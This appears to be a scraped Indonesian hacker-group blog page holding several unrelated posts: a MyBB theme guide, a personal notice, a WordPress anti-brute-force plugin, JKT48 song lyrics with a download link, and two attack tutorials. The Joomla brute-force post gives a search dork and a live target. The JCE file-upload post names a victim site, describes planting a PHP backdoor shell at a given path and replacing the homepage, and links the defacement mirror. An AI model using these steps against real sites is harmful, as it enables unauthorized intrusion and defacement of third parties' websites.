New Name : Beri nama tema terserah anda.

Di bagian :

Advanced Options , centang Ignore Version Compatibility

Lalu klik Import Theme

Lihat Screenshoot :

Lalu kembali ke menu utama. Klik Options - Set As Default.

Lihat SS :

Done. Sekarang lihat halaman depan MyBB anda. Tema baru pasti sudah aktif. :)

Sekian tutorial kali ini. Semoga bermanfaat.

Created by Nabilaholic - Madura Cyber

Nabilaholic Personal Blog

Sebelumnya saya minta maaf karena beberapa hari ini saya tidak blogwalking. Bukan karena tidak ingin silaturahmi ke blgo sahabat, namun mulai Senin ekmarin SMA memang sedag ada Ujian Akhir Sekolah. Dan artikel yang saya publish kemarin-kemarin itu sudah tersimpan di draft jauh jauh hari. :v

Berhubung besok libur, saya sempatkan untuk membuat artikel ini. Beberapa hari yang lalu, tepatnya saat Cindy Gulla ulang tahun, saya membuat subdomain portal.madura-cyber.org untuk menaruh script ucapan selamat ulang tahun buat Cindy [sekarang scriptnya sudah diganti].

Di saat yang sama sebenarnya saya juga membuat blog bau dengan subdomain blog.madura-cyber.org . Blog tersebut rencananya akan diisi dengan tulisan-tulisan ringan tentang kegiatan sehari-hari atau juga untuk mempublish cerpen/fanfic buatan saya. :D

Sehingga nantinya www.madura-cyber.org hanya berisi tutoial-tutorial ataupun berita-berita. Yang mau blogwalking terserah mau ke yang mana, www.madura-cyber.org atau http://blog.madura-cyber.org . Sama-sama aktif kok. :D

Sekian pemberitahuan kali ini dan mungkin dalam seminggu kedepan belum bisa aktif blogwalking lagi karena masih ada Ujian. :)

Plugin WordPress ~ Login LockDown

Assalamualaikum sobat IDCA, di blog udah dishare beberapa macam tutorial attacking website, sekarang gantian pengamanannya yaa :D

Login LockDown , plugin ini mencatat alamat IP dan timestamp dari setiap kegagalan login pada CMS Wordpress. Jika sudah melebihi jumlah kesalahan login yang sudah ditentukan maka IP akan di banned.

Untuk mengubah Settingan nya silahkan Anda gunakan PLUGIN ini melalui panel Options. Admisitrators dapat melepaskan kunci di luar rentang IP secara manual.

Plugin ini untuk menghindari serangan attacker yang memanfaatkan metode " Brute Force Attack " yaitu serangan yang menebak password untuk login ke suatu website.

Bagi temen temen IDCA yang berminta memasang plugin ini, bisa kalian download disini :

~ DOWNLOAD ~

Content Creator : Bimo Septiawan

Joomla Bruteforce

Assalamualaikum...

Hai sobat, udah pada tau belum tentang bruteforce? :o kalo belum silahkan tanya karo mbah google, aku yo males arek tekok2 karo mbahku :3 hahaha... yo wes lah.. :p

Pada postingan sebelumnya saya sudah membahas mengenai brutefoce, tapi sekarang kasusnya berbeda. kalo sebelumnya bruteforce untuk CMS Wordpress, nah yang ini khusus untuk CMS Joomla :D

Toolsnya sendiri ini dibuat oleh om saya, tapi ga tau omnya yang mana :( cuma tau nicknya aja :D yah siapa yg kagak kenal sama om Hmei7 :D entahlah saya juga ga kenal, yang saya kenal cuma om Hiddenymei12,, wkwkwkwk :D v thanks to om Hmei7, ijin pinjem toolsnya :D (*biar ga kena kritik :D )

Lanjuut dah, sebelum coba2 siapin dulu bahan2nya:

1. Dork: inurl:"/templates/beez5/" intitle:Index of /administrator/

2. Brute v.2 | Download

3. Live Target : www.live-target.pusku.com/joomla/

Lanjut lagi, :)

Yah seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih maknyoos :D

Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file listsite.txt, disini ane cuma satu aja, sekedar buat coba2 apakah toolsnya masih bekerja atau tidak. :p ya begitulah :p dan kalo list passwordnya mo dibanyakin juga boleh :p

Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat! lalu klik open! dan  klik Scan...

Tinggal nunggu hasilnya  :) yang sabar yah :p

Kalo udah nemu password yang cocok, tinggal login dah!

Nah ternyata toolnya masih bekerja dengan baik :)

Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan cuma enaknya doank, wkwkwk :D

Sekian tutorial ini, mudah2an bermafaat dan bisa menambah pengetahuan sobat semua :)

Content Creator: Onix AQua Menyapa ^_^

Download Lagu JKT48 Kimi ni Au Tabi Koi wo Suru

Kali ini saya akan share salah satu Lagu JKT48 yaitu Kimi ni Au Tabi Koi wo Suru yang juga tergabung dalam Album RIVER. Lagunya sudah pasti clean version lah. Kalo belum ada yang clean version Madura Cyber juga gak bakalan share. :)

Oke langsung saja. Ini Lirik Lagu JKT48 Kimi ni Au Tabi Koi wo Suru :

Di reuni itu, setelah sekian lama

Kau duduk di sebelahku

Yang benar, yang paling ingin kutemui

Cinta yang tak berbalas itu



Kau memanjangkan rambut

Dan menjadi dewasa

Dirimu sangat bersinar



Dua kali jatuh cinta

Di lubuk hatiku yang dalam

Waktu tertidur pun membuka mata

Ah...

Ketika engkau tersenyum

Hatiku menjadi sakit

Aku tak mampu berkata



Setelah upacara kelulusan usai

Kita tinggal di ruang kelas

"Selalu, selalu menjadi teman ya"

Kita semua mengikat janji



Dirimu yang terkunci

Di dalam kenangan

Sekarang bangkit kembali



Dua kali jatuh cinta

Sama seperti sebelumnya

Debar yang nostalgik kembali terasa

Ah...

Setiap bertemu denganmu

Aku akan jatuh cinta

Sampai berapa kalipun



Dua kali jatuh cinta

Di lubuk hatiku yang dalam

Waktu tertidur pun membuka mata

Ah...

Ketika engkau tersenyum

Hatiku menjadi sakit

Aku tak mampu berkata



Nih Link Downloadnya :

Download Lagu JKT48 Kimi ni Au Tabi Koi wo Suru



Dan terakhir, say thanks to me. :)

Exploit Joomla JCE Remote File Upload Vulnerability

Wordpress dan Joomla. Ya, kedua CMS itu memang yang paling banyak terdapat bug yang bisa dideface lewat exploit exploit sederhana. Dan kali ini saya akan share cara mudah deface web CMS Joomla dengan Exploit Joomla JCE Remote File Upload Vulnerability. Tentu saja dengan kreatifitas kalian dalam mengolah dork. :p

Oke langsung saja.

Bahan-bahan :

Tools Joomla Exploiter <-- Klik untuk download. Password RAR : yuyud-jeje [ passwordnya maksa banget. :v ]

Google Dork : inurl:index.php?option=com_jce . Use your brain. Kembangin sendiri dorknya. :)



Langkah-langkah.

Pertama, cari target di Google dengan dork diatas. Cari satu-satu. Yang sabar. Untuk tutorial ini target saya adalah http://defelsko.su/ .

Buka Tools Joomla Exploiter [ JCE.exe ] , masukkan web target lalu klik start. Lihat SS :

Step 1

Tunggu sampai proses upload selesai. Jika target memang vuln, maka akan muncul link seperti di Screenshoot berikut :

Step 2

Jika tidak ada berarti target tidak vuln Cari web lain.

Jika muncul link seperti di SS, tinggal kita buka link yang tertera disitu. :) .

http://[site]/images/stories/3xp.php

Maka akan muncul Uploader. Kalian bisa mengupload Backdoor lewat situ. Lihat SS :

Step 3

Biasanya bisa upload file .php , namun ada beberapa web yang gagal saat upload file .php . Jika gagal, coba upload file html atau txt . :)

Kali ini saya coba upload Backdoor .php dan berhasil. Jika berhasil akan ada notice Upload ok :d !!! . Lihat SS :

Step 4

Oke, sekarang tinggal kita buka Backdoornya. Tinggal ubah 3xp.php di url menjadi namashell.php . Sehingga menjadi [site]/images/stories/namashell.php .

Buka Backdoornya :)

Our Privat Shell. :)

Kalau sudah begitu ya terserah mau diapain. Langsung cari indexnya, tebas  :v

Defaced. :3

http://defelsko.su/index.html

Mirror :

http://www.zone-h.org/mirror/id/19953295



Sekian tutorial kali ini. Jadikan pembelajaran saja. Kalo ada apa-apa, resiko tanggung dewe. Use at Your Own Risk !!

Created by Nabilaholic - Madura Cyber